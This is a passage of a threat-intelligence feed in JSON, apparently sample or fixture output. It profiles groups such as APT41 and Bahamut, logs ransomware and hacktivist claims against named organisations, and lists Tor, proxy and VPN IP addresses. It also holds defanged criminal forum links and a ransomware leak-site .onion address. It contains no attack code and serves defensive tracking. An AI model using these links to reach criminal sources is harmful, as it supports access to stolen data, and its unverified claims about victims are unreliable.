APT41 considered to be a few chinese APT groups conglomerate which includes Group 72, PassCV, APT17.

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "files": [], + "goals": [ + "Information", + "Research", + "Financial" + ], + "hasIocs": true, + "id": "59a1326f2bed234dcb864a69e7ab28b2fa4b14e9", + "isAPT": true, + "labels": [ + "hacker", + "spy", + "nation-state" + ], + "langs": [ + "ru", + "en" + ], + "name": "APT41", + "oldId": null, + "roles": [ + "malware-author", + "infrastructure-architect", + "infrastructure-operator" + ], + "seqUpdate": 17275680181282, + "spokenOnLangs": [ + "zh" + ], + "stat": { + "allIndicatorsCount": 3188, + "allReportsCount": 129, + "contactsCount": 143, + "countries": [ + "TW", + "KR", + "US", + "JP", + "IN", + "VN", + "PH", + "CN", + "HK", + "GB", + "MY", + "SG", + "TH", + "RU", + "CA", + "DE", + "AU", + "IT", + "FR", + "ID", + "SA", + "AE", + "BR", + "CH", + "DK", + "FI", + "MX", + "PK", + "PL", + "QA", + "SE", + "UA", + "KG", + "KZ", + "MM", + "NP", + "AF", + "AR", + "BE", + "BH", + "BY", + "CL", + "CZ", + "ES", + "FJ", + "IL", + "KW", + "LK", + "MO", + "NL", + "PE", + "SK", + "TJ", + "UZ" + ], + "cve": [ + "CVE-2017-0199", + "CVE-2013-0633", + "CVE-2013-0634", + "CVE-2017-11882", + "CVE-2018-5713", + "CVE-2019-11510", + "CVE-2019-16278", + "CVE-2019-1652", + "CVE-2019-1653", + "CVE-2019-16920", + "CVE-2019-18935", + "CVE-2019-19781", + "CVE-2019-3396", + "CVE-2019-9621", + "CVE-2019-9670", + "CVE-2020-10189", + "CVE-2021-1675", + "CVE-2021-22205", + "CVE-2021-26855", + "CVE-2021-26857", + "CVE-2021-26858", + "CVE-2021-27065", + "CVE-2021-31207", + "CVE-2021-34473", + "CVE-2021-34481", + "CVE-2021-34523", + "CVE-2021-34527", + "CVE-2021-36958", + "CVE-2021-44207", + "CVE-2021-44228", + "CVE-2022-24682", + "CVE-2022-27924", + "CVE-2022-27925", + "CVE-2022-30333", + "CVE-2022-37042", + "CVE-2022-39952", + "CVE-2022-40684" + ], + "dateFirstSeen": "2009-11-27", + "dateLastSeen": "2024-09-29", + "expertise": [ + "AutoReport", + "Backdoor", + "Cobalt Strike", + "Windows", + "Active Directory", + "Exploit", + 
"Access", + "Rootkit", + "Stealer", + "x64", + "Compromised data", + "Metasploit", + "CVE", + "Fileless", + "Loader", + "Shell", + "Unix", + "Android", + "Brief Report", + "Corporate network", + "Keylogger", + "RAT", + "Ransomware", + "Replacer", + "Web-inject" + ], + "forumsAccountsCount": 0, + "malware": [ + "Cobalt Strike", + "Winnti", + "ShadowPad", + "PlugX", + "Mimikatz", + "Crosswalk", + "FunnySwitch", + "KEYPLUG", + "Metasploit", + "PHOTO", + "SQLMap", + "9002 RAT", + "China Chopper", + "Cobalt Strike Beacon", + "PWNLNX", + "Pipemon", + "PortReuse", + "Spyder", + "WINNKIT", + "AceHash", + "Bisonal", + "Brute Ratel", + "CRACKSHOT", + "ColdLock", + "DBoxAgent", + "DEPLOYLOG", + "Gh0st", + "HDRoot", + "MESSAGETAP", + "Microcin", + "MoonBounce", + "PRIVATELOG", + "PWNDROID4", + "Poison Ivy", + "PowerSploit", + "RedXOR", + "SPARKLOG", + "STASHLOG", + "ShadowHammer", + "SideWalk", + "SkinnyD", + "Speculoos", + "XMRig", + "ZxShell", + "nmap", + "skip-2.0", + "xDll" + ], + "regions": [ + "asia", + "america:northern_america", + "europe", + "europe:european_union", + "oceania", + "middle_east", + "america:south_america", + "america:central_america" + ], + "relatedThreatActorsCount": 0, + "reports": [ + { + "companyId": [], + "datePublished": "2024-09-29", + "id": "5335d2f653b14eabfcd810e4d57e852668623213", + "name": { + + "en": "APT41 - New indicators have been found" + } + }, + { + "companyId": [], + "datePublished": "2024-09-24", + "id": "d1da0a53543a18e5240ece12d031b6ad711a8202", + "name": { + + "en": "APT41 - New indicators have been found" + } + }, + { + "companyId": [], + "datePublished": "2024-09-22", + "id": "b4a95fd5b5dd43181865220fc8eb0fba9aba5bfc", + "name": { + + "en": "APT41 - New indicators have been found" + } + } + ], + "sectors": [ + "gaming:online-games", + "hardware:telecommunications", + "government-and-military", + "information-technology:information-technology", + "energy:energy", + "government-and-military:government", + 
"manufacturing:manufacturing", + "other:universities", + "content-and-publishing:news", + "health-care:health-care", + "real-estate:construction", + "software:software", + "transportation:air-transportation", + "manufacturing", + "other:non-profit", + "transportation:transportation", + "education:education", + "financial-services:consumer-lending", + "financial-services:credit", + "gaming:console-games", + "gaming:video-games", + "government-and-military:military", + "professional-services:legal", + "real-estate:real-estate", + "science-and-engineering:aerospace", + "travel-and-tourism:tourism", + "travel-and-tourism:travel", + "financial-services", + "financial-services:financial-services", + "government-and-military:national-security", + "health-care", + "health-care:pharmaceutical", + "transportation:logistics", + "travel-and-tourism:hospitality", + "advertising:social-media-advertising", + "commerce-and-shopping:retail", + "commerce-and-shopping:retail-technology", + "consumer-electronics:computer", + "consumer-electronics:consumer-electronics", + "education", + "financial-services:accounting", + "financial-services:health-insurance", + "financial-services:insurance", + "information-technology", + "media-and-entertainment", + "other:consumer", + "other:infrastructure", + "other:small-and-medium-businesses", + "real-estate:building-maintenance", + "real-estate:property-development", + "sales-and-marketing:digital-marketing", + "science-and-engineering:chemical", + "software", + "transportation", + "transportation:shipping", + "travel-and-tourism:hotel" + ], + "targetedCompany": [ + "Air India", + "Apptricity Corporation", + "Changhua Christian Hospital", + "Delta Electronics", + "EC Pay", + "ESTsoft Corp", + "HO CHI MINH NATIONAL POLITICAL ACADEMY", + "Juphoon System Software", + "Mandarin Daily News", + "NCsoft", + "NEXON Corporation", + "NHN Corporation", + "National Development Fund of Taiwan", + "Neowiz CORPORATION", + "Prospera Hotels", + "Royal Thai Air 
Force", + "Royal Thai Navy", + "TVBS Media", + "YD Online Corp.", + "Arktos Entertainment Group", + "Asiasoft Corporation", + "AsusTek Computer Inc.", + "BASF", + "Battlestate Games", + "CPC Corp.", + "Cayenne Entertainment Technology Co.,Ltd", + "Cebu Technological University", + "Chienkuo Technology University", + "Chunnam Techno University", + "Covestro", + "EPiServer AB", + "EYA soft", + "Electronics Extreme Limited", + "Electronics Extreme Ltd.", + "En Masse Entertainment", + "Fantasy Technology Corp", + "Fortuna Games Co", + "Fortuna Games Co.", + "Fuqing Dawu Technology", + "Fuqing Dawu Technology Co", + "GameUS Inc", + "Garena Online Pte Ltd", + "Garena Online Pvt Ltd", + "Garena online", + "Global Commercial Technology Co.,LTD.", + "Global Commercial Technology Co.,LTD. ", + "Gravity Co., Ltd", + "Guangzhou YuanLuo Technology Co", + "Guangzhou YuanLuo Technology Co.", + "Hammerpoint Interactive", + "Hangame", + "Hangame Japan", + "Henkel", + "Hong Kong Shue Yan University", + "Internap Corporation", + "Kog Co., Ltd.", + "Konkuk University", + "LANXESS", + "Lingnan University", + "Lion Air", + "LivePlex Corp", + "MGAME Corp", + "MGAME Corp.", + "Marriott", + "NOX Entertainment", + "NOX Entertainment Co., Ltd", + "NTC Technology Ltd", + "Nanjing Ranyi Technology Co.", + "Nanjing Ranyi Technology Co., Ltd.", + "Neoact Co", + "NetSarang Computer, Inc.", + "OP Productions, LLC", + "Redduck Inc.", + "Roche", + "Rosso Index KK", + "Royal Thai Armed Forces", + "Runewaker Entertainment", + "SK Broadband Co Ltd", + "Schroders", + "Sesisoft", + "Shanda Games", + "Shin-Etsu", + "Sichuan Qiyu Network Technology", + "Sichuan Qiyu Network Technology Co., Ltd.", + "Siemens", + "Sumitomo", + "THANH TRA CHÍNH PHỦ", + "TeamViewer", + "Trion Worlds", + "VNG Corporation", + "Valve", + "WEBZEN", + "WVT (HK) COMPANY LIMITED", + "Webzen Inc.", + "Wemade Entertainment", + "Wemade Entertainment co.", + "XL Games", + "XL Games Co", + "XL Games Co.,Ltd", + "YNK Japan", + "ZEALOT 
DIGITAL INTERNATIONAL CORPORATION", + "Zemi Interactive Co", + "Zemi Interactive Inc.", + "Zepetto", + "ZerodinGames Co., Ltd", + "eDong" + ], + "targetedPartnersAndClients": [ + "Piriform Ltd." + ] + }, + "techSeqUpdate": null, + "threatLandscapeOptions": [ + { + "label": "company", + "value": "company" + }, + { + "label": "partner", + "value": "partner" + }, + { + "label": "industry", + "value": "industry" + }, + { + "label": "other", + "value": "other" + } + ], + "updatedAt": "2024-09-29T03:00:18+03:00" + }, + { + "addedToThreatLandscapeFor": null, + "aliases": [], + "country": null, + "createdAt": "2019-02-20T17:44:21+00:00", + "description": "

BAHAMUT is the name given to a cyberespionage threat actor by researchers writing for Bellingcat in 2017. 

The APT group BAHAMUT is behind a \"staggering\" number of ongoing malicious campaigns against government members and senior business leaders in the Middle East and South Asia. The members of BAHAMUT are allegedly mercenaries who provide services to those who offer the best price. The Bahamut group mainly uses phishing websites, fake news websites, and social networking sites to attack.

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "files": [], + "goals": [], + "hasIocs": true, + "id": "abbce934395e21f6669e99f9caf6d741ef8ea7d0", + "isAPT": true, + "labels": [], + "langs": [ + "en", + "ru" + ], + "name": "Bahamut", + "oldId": null, + "roles": [], + "seqUpdate": 17277408454364, + "spokenOnLangs": [], + "stat": { + "allIndicatorsCount": 63, + "allReportsCount": 35, + "contactsCount": 0, + "countries": [ + "IN", + "PK", + "SA" + ], + "cve": [], + "dateFirstSeen": "2022-01-06", + "dateLastSeen": "2024-09-30", + "expertise": [ + "AutoReport", + "Brief Report" + ], + "forumsAccountsCount": 0, + "malware": [], + "regions": [ + "asia", + "middle_east" + ], + "relatedThreatActorsCount": 0, + "reports": [ + { + "companyId": [], + "datePublished": "2024-10-01", + "id": "bb57c20ac0e9c2fdea65676abb90b243b6e2eb9b", + "name": { + + "en": "Bahamut - New indicators have been found" + } + }, + { + "companyId": [], + "datePublished": "2024-09-28", + "id": "aac4f317e4bf9cdf4162b5650fc784dd78a0efb9", + "name": { + + "en": "Bahamut - New indicators have been found" + } + }, + { + "companyId": [], + "datePublished": "2024-09-23", + "id": "8dd54f04fbac850457a9b9a1e2cb409d4ea309e6", + "name": { + + "en": "Bahamut - New indicators have been found" + } + } + ], + "sectors": [ + "government-and-military" + ], + "targetedCompany": [], + "targetedPartnersAndClients": [] + }, + "techSeqUpdate": null, + "threatLandscapeOptions": [ + { + "label": "company", + "value": "company" + }, + { + "label": "partner", + "value": "partner" + }, + { + "label": "industry", + "value": "industry" + }, + { + "label": "other", + "value": "other" + } + ], + "updatedAt": "2024-10-01T03:00:45+03:00" + } + ], + "seqUpdate": 17277408454364 + }, + "hi/threat_actor":{ + "count": 152, + "items": [ + { + "addedToThreatLandscapeFor": null, + "aliases": [], + "country": "KH", + "createdAt": "2023-07-07T02:24:07+00:00", + "description": "

 

The group started its activity at the end of spring 2023.


Among the targets, the group clearly prioritizes Indonesia and Thailand. However, like most hacktivist groups, they also attack states associated with any high-profile newsworthy events.

In contrast to most similar NDT groupings, NEC pays a lot of attention to attacks that lead to leaks or obtaining and subsequent publication of access to any admin panel. Presumably, the group uses SQLmap as the main tool for such attacks.
The group refers to the region of Cambodia and, predominately, to the Khmers. Telegram channel (@ndtgroup_kh) uses English and sometimes Khmer.

 

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "files": [], + "goals": [], + "hasIocs": false, + "id": "af636987c56e51f88cde01da2a2f01c304e21677", + "isAPT": false, + "labels": [], + "langs": [ + "en" + ], + "name": "NDT SEC", + "oldId": null, + "roles": [], + "seqUpdate": 17271118627713, + "spokenOnLangs": [ + "en" + ], + "stat": { + "allIndicatorsCount": 0, + "allReportsCount": 27, + "contactsCount": 21, + "countries": [ + "TH", + "ID", + "FR", + "NZ", + "VN" + ], + "cve": [], + "dateFirstSeen": "2023-05-13", + "dateLastSeen": "2024-09-23", + "expertise": [ + "DDOS", + "Hacktivism", + "Hactivism", + "AutoReport", + "Leak", + "Deface", + "Hacktivist", + "mea_tension" + ], + "forumsAccountsCount": 0, + "malware": [], + "regions": [ + "asia", + "europe:european_union", + "oceania" + ], + "relatedThreatActorsCount": 0, + "reports": [ + { + "companyId": [], + "datePublished": "2024-09-23", + "id": "d32e021fe8fb389ecb5947b9a644ca05185f0e7e", + "name": { + + "en": "NDT SEC posted message containing data about possible attack targeting Indonesia" + } + }, + { + "companyId": [], + "datePublished": "2024-09-23", + "id": "f4626c8b0e3e8f0f0cf1ba30fa3cea5256bf0997", + "name": { + + "en": "NDT SEC posted message containing data about possible attack targeting Indonesia" + } + }, + { + "companyId": [], + "datePublished": "2024-09-23", + "id": "5f255b8924ffd41487ebac0e0a8d0aa4e445a13f", + "name": { + + "en": "NDT SEC posted message containing data about possible attack targeting bali-airport.com" + } + } + ], + "sectors": [ + "government-and-military", + "government-and-military:government", + "commerce-and-shopping:retail", + "education", + "energy:electrical-distribution", + "financial-services", + "financial-services:banking" + ], + "targetedCompany": [], + "targetedPartnersAndClients": [] + }, + "techSeqUpdate": null, + "threatLandscapeOptions": [ + { + "label": "company", + "value": "company" + }, + { + "label": "partner", + "value": "partner" + 
}, + { + "label": "industry", + "value": "industry" + }, + { + "label": "other", + "value": "other" + } + ], + "updatedAt": "2024-09-23T20:17:42+03:00" + }, + { + "addedToThreatLandscapeFor": null, + "aliases": [ + "grep", + "grepcn", + "grepmoj" + ], + "country": null, + "createdAt": "2024-08-29T17:09:34+05:00", + "description": "

The user with the alias grep has been active on the underground forum breachforums[.]st since July 3, 2024.

Link to user's profile: 

hxxps://breachforums[.]st/User-grep

The threat actor's main activity is data and access leakage

 grep has the same signature as two others threat actors: IntelBroker and EnergyWeaponUser

The actor with the alias grepmoj also joined XSS on September 9, 2024. Link to the profile: hxxps://xss[.]is/members/382722/

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "files": [ + { + "hash": "d8e3c27ddd39d7cbb9e5adfa037ee4df26f91e0a7d8f7d2f21e34281e29fe31c", + "mime": "image/png", + "name": "d8e3c27ddd39d7cbb9e5adfa037ee4df26f91e0a7d8f7d2f21e34281e29fe31c", + "size": 490571 + }, + { + "hash": "47c23bca8feec188cc4d969de751037c57312cf4b7f96769b77e7b021610576b", + "mime": "image/png", + "name": "47c23bca8feec188cc4d969de751037c57312cf4b7f96769b77e7b021610576b", + "size": 156035 + }, + { + "hash": "866f3e0549e6dbae926c59e87e8d9506a878820e283f7f32f1b81f4d5f166a43", + "mime": "image/png", + "name": "866f3e0549e6dbae926c59e87e8d9506a878820e283f7f32f1b81f4d5f166a43", + "size": 84798 + }, + { + "hash": "46fd1f61dbb3fee5e478c506dcf91713605ad0ad36313df8ce6ef2c6c3c3f022", + "mime": "image/png", + "name": "46fd1f61dbb3fee5e478c506dcf91713605ad0ad36313df8ce6ef2c6c3c3f022", + "size": 40110 + } + ], + "goals": [], + "hasIocs": false, + "id": "6f99ebe40786111b7cceba8dccba662029d1e094", + "isAPT": false, + "labels": [], + "langs": [ + "en" + ], + "name": "grep", + "oldId": null, + "roles": [], + "seqUpdate": 17271683148763, + "spokenOnLangs": [], + "stat": { + "allIndicatorsCount": 0, + "allReportsCount": 3, + "contactsCount": 0, + "countries": [ + "EG", + "FR", + "ID", + "IN" + ], + "cve": [], + "dateFirstSeen": "2024-08-29", + "dateLastSeen": "2024-09-23", + "expertise": [ + "Compromised data", + "Leak", + "Database" + ], + "forumsAccountsCount": 3, + "malware": [], + "regions": [ + "asia", + "africa:northern_africa", + "europe:european_union" + ], + "relatedThreatActorsCount": 0, + "reports": [ + { + "companyId": [], + "datePublished": "2024-09-24", + "id": "2f580853070b70a12820e9b5e03f2e3823f5b318", + "name": { + "en": "Publication of data allegedly related to Indonesia's Ministry of Education, Culture, Research, and Technology" + } + }, + { + "companyId": [], + "datePublished": "2024-09-11", + "id": "07793f6779060b7df96ab0960c0b05ad6b9f94a0", + "name": { + "en": 
"Publication of Capgemini data" + } + }, + { + "companyId": [], + "datePublished": "2024-08-30", + "id": "99e0dafd7b780acd0d8366df2bab0660a8c623e4", + "name": { + "en": "Sale of database allegedly belonging to MedicaMall" + } + } + ], + "sectors": [ + "commerce-and-shopping:e-commerce", + "education", + "health-care:medical-device", + "information-technology", + "manufacturing:industrial", + "professional-services:consulting" + ], + "targetedCompany": [ + "Capgemini", + "Ministry of Education, Culture, Research, and Technology (Indonesia)" + ], + "targetedPartnersAndClients": [] + }, + "techSeqUpdate": null, + "threatLandscapeOptions": [ + { + "label": "company", + "value": "company" + }, + { + "label": "partner", + "value": "partner" + }, + { + "label": "industry", + "value": "industry" + }, + { + "label": "other", + "value": "other" + } + ], + "updatedAt": "2024-09-24T11:58:34+03:00" + } + ], + "seqUpdate": 17271683148763 + }, + "hi/threat":{ + "count": 1355, + "items": [ + { + "contacts": [], + "countries": [ + "CA" + ], + "createdAt": "2024-09-23T06:16:41+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-23", + "description": "

2024-09-23 Qilin ransomware attacked Canstar Restorations canstarrestorations[.]com.

Screenshot from Qilin DLS

At present data wasn't posted on a Data Leak Site (DLS). ", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": null + }, + "expertise": [ + "Leak", + "Ransomware", + "AutoReport" + ], + "files": [ + { + "hash": "9f432b3fd71ed9e40ca5e35cb7630d7dd3499245edcee601915011ad0a356ab7", + "mime": "image/png", + "name": "9f432b3fd71ed9e40ca5e35cb7630d7dd3499245edcee601915011ad0a356ab7", + "size": 2895505 + } + ], + "forumsAccounts": [], + "hasIocs": false, + "id": "d4a164b9caecc0d28041bb042bfad1acfb91f77a", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [], + "indicatorsIds": [], + "isAutogen": false, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [ + { + "attackPatternId": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "attackTactic": "impact", + "attackType": "enterprise_tactics", + "id": null, + "mitreId": "T1486", + "params": null + } + ], + "oldId": null, + "regions": [ + "america:northern_america" + ], + "relatedThreatActors": [], + "reportNumber": "CP-2809-0616", + "sectors": [ + "real-estate:construction" + ], + "seqUpdate": 17270614084038, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [ + "http://kbsqoivihgdmwczmxkbovk7ss2dcynitwhhfu5yw725dboqo5kthfaad.onion/site/view?uuid=f73f99c9-0a5d-36ff-8fab-36e936caab39" + ], + "targetedCompany": [ + "Canstar Restorations" + ], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": null, + "id": "18c14c0707e5cdaeb7975576fa54a4346d154619", + "isAPT": false, + "name": "Qilin" + }, + "title": "Qilin Ransomware attack on Canstar Restorations", + "toolList": [], + "type": "threat", + "unreliableIndicators": [], + 
"unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-23T06:16:48+03:00" + }, + { + "contacts": [ + { + "account": "sillycatsfr", + "flag": "fake", + "service": "telegram", + "type": "im" + }, + { + "account": "ftpcat", + "flag": "fake", + "service": "telegram", + "type": "im" + } + ], + "countries": [], + "createdAt": "2024-09-23T11:45:16+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-15", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-23", + "description": "

Pryx created a Telegram channel on 2024-09-15 named “The daily PRYX”:

 

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "green", + "tlp": "green", + "ttl": null + }, + "expertise": [], + "files": [ + { + "hash": "2cd0d8754286f5482adfa66518aa001daef66d0978a1ca7a7793a6ef9a857eef", + "mime": "image/png", + "name": "2cd0d8754286f5482adfa66518aa001daef66d0978a1ca7a7793a6ef9a857eef", + "size": 377290 + } + ], + "forumsAccounts": [], + "hasIocs": false, + "id": "4b6fd64b149127836d5ad524debf44917befc231", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [], + "indicatorsIds": [], + "isAutogen": false, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-1145", + "sectors": [], + "seqUpdate": 17270815547585, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": null, + "id": "3b4ad4eaa284c3a8a4965e71be53959fae00c98a", + "isAPT": false, + "name": "Pryx" + }, + "title": "General information - new contacts", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-23T11:52:34+03:00" + }, + { + "contacts": [ + { + "account": "@examlpe", + "flag": "fake", + "service": "telegram", + "type": "im" + } + ], + "countries": [], + "createdAt": "2024-09-23T13:04:25+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-23", + "description": "

On 2024-09-23 in their Telegram channel (hxxps://t[.]me/ServerKillers) Server Killers posted message containing information about possible attack

We hacked South Korean Cameras!\n\nMost of the cameras are located in Seoul, Incheon, Daejeon, Suwon\n\nWe hacked:\n   Cafe Cameras \n   Restaurant Cameras \n   Home Cameras \n   Computer Room Cameras\n   Car Parking Cameras\n   Street Cameras\n   Office Cameras\n   Supermarket Cameras\n\nWe have hacked 100+ South Korean Cameras
\n", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "orange", + "tlp": "amber", + "ttl": null + }, + "expertise": [ + "AutoReport", + "Deface" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": false, + "id": "13aad85a2c8eccce7217be1e16e39486c987bf17", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [], + "indicatorsIds": [], + "isAutogen": false, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-1304", + "sectors": [], + "seqUpdate": 17270858675384, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "RU", + "id": "8d22ccb2f4aace36992ce5ec9cf431c138536820", + "isAPT": false, + "name": "Server Killers" + }, + "title": "Server Killers posted message containing data about possible attack", + "toolList": [], + "type": "threat", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-23T13:04:27+03:00" + } + ], + "seqUpdate": 17270858675384 + }, + "suspicious_ip/tor_node":{ + "count": 252997, + "items": [ + { + "bind": null, + "dateFirstSeen": "2023-03-15T12:03:39+00:00", + "dateLastSeen": "2023-03-15T12:03:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 90, + "reliability": 90, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "id": "156.146.57.182", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "156.146.57.182", + "provider": null, + "region": null + }, + "nodes": [], + "portalLink": null, + "seqUpdate": 1682360252525000, + 
"source": "check.torproject.org" + }, + { + "bind": null, + "dateFirstSeen": "2023-03-22T06:07:10+00:00", + "dateLastSeen": "2023-03-22T06:07:10+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 90, + "reliability": 90, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "id": "188.241.80.46", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "188.241.80.46", + "provider": null, + "region": null + }, + "nodes": [], + "portalLink": null, + "seqUpdate": 1682360269562000, + "source": "check.torproject.org" + }, + { + "bind": null, + "dateFirstSeen": "2022-05-02T19:08:51+00:00", + "dateLastSeen": "2022-08-23T07:36:12+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 90, + "reliability": 90, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "id": "83.137.158.16", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "83.137.158.16", + "provider": null, + "region": null + }, + "nodes": [], + "portalLink": null, + "seqUpdate": 1682360409780000, + "source": "tor_banner" + } + ], + "seqUpdate": 1682360409780000 + }, + "suspicious_ip/open_proxy":{ + "count": 3454691, + "items": [ + { + "anonymous": "", + "bind": null, + "dateDetected": "2014-10-01T13:46:14+00:00", + "dateFirstSeen": "2014-10-01T13:46:14+00:00", + "dateLastSeen": "2014-10-01T13:46:14+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "61.238.12.158", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "HK", + "countryName": null, + "ip": "61.238.12.158", + "provider": null, + "region": null + }, + "oldId": "11aaaac89b10f8863fef7335a1f7839a23c9a710", + "port": 8088, + "portalLink": null, + "seqUpdate": 1460383585066000, + "source": "free-proxy-list.net", + "sources": [ + "free-proxy-list.net" + ], + "stixGuid": null, + "type": "http" + }, + { + 
"anonymous": "", + "bind": null, + "dateDetected": "2014-10-01T13:46:14+00:00", + "dateFirstSeen": "2014-10-01T13:46:14+00:00", + "dateLastSeen": "2014-10-01T13:46:14+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "1.175.177.135", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "TW", + "countryName": null, + "ip": "1.175.177.135", + "provider": null, + "region": null + }, + "oldId": "78001defd30996ea8d4e770730631863bbd67ce9", + "port": 9064, + "portalLink": null, + "seqUpdate": 1460383585071000, + "source": "free-proxy-list.net", + "sources": [ + "free-proxy-list.net" + ], + "stixGuid": null, + "type": "https" + }, + { + "anonymous": "", + "bind": null, + "dateDetected": "2014-10-01T13:46:14+00:00", + "dateFirstSeen": "2014-10-01T13:46:14+00:00", + "dateLastSeen": "2014-10-01T13:46:14+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "61.62.7.209", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "TW", + "countryName": null, + "ip": "61.62.7.209", + "provider": null, + "region": null + }, + "oldId": "b3ac84363ff3659472a64dc6c313b5d0b0df4866", + "port": 9064, + "portalLink": null, + "seqUpdate": 1460383585073000, + "source": "free-proxy-list.net", + "sources": [ + "free-proxy-list.net" + ], + "stixGuid": null, + "type": "https" + } + ], + "seqUpdate": 1460383585073000 + }, + "suspicious_ip/socks_proxy":{ + "count": 28086846, + "items": [ + { + "bind": null, + "dateDetected": "2014-11-05T05:00:11+00:00", + "dateFirstSeen": "2014-11-05T05:00:11+00:00", + "dateLastSeen": "2014-11-05T17:00:11+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "114.143.160.66", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "IN", 
+ "countryName": null, + "ip": "114.143.160.66", + "provider": null, + "region": null + }, + "oldId": "a78ecc975e74876300f6ee54d829fabf6e1fc243", + "portalLink": null, + "seqUpdate": 1460491661013000, + "source": "awmproxy", + "stixGuid": null + }, + { + "bind": null, + "dateDetected": "2014-11-05T05:20:03+00:00", + "dateFirstSeen": "2014-11-05T05:20:03+00:00", + "dateLastSeen": "2014-11-05T17:20:03+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "91.185.11.165", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "KZ", + "countryName": null, + "ip": "91.185.11.165", + "provider": null, + "region": null + }, + "oldId": "afa5e3e33a0d78d8dfc06f502400c4c17ffaf33d", + "portalLink": null, + "seqUpdate": 1460491661026000, + "source": "awmproxy", + "stixGuid": null + }, + { + "bind": null, + "dateDetected": "2014-11-05T05:01:06+00:00", + "dateFirstSeen": "2014-11-05T05:01:06+00:00", + "dateLastSeen": "2014-11-05T17:01:06+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "1.46.71.151", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "TH", + "countryName": null, + "ip": "1.46.71.151", + "provider": null, + "region": null + }, + "oldId": "f8eb2e7a96a6d5fa18232b74660a911a1511a435", + "portalLink": null, + "seqUpdate": 1460491661046000, + "source": "awmproxy", + "stixGuid": null + } + ], + "seqUpdate": 1460491661046000 + }, + "suspicious_ip/vpn":{ + "count": 741499, + "items": [ + { + "bind": null, + "dateFirstSeen": "2021-04-22T12:43:38+00:00", + "dateLastSeen": "2021-04-22T12:43:38+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "188.250.243.135", + "ipv4": { + "asn": "AS3243", + "city": null, + "countryCode": "PT", + 
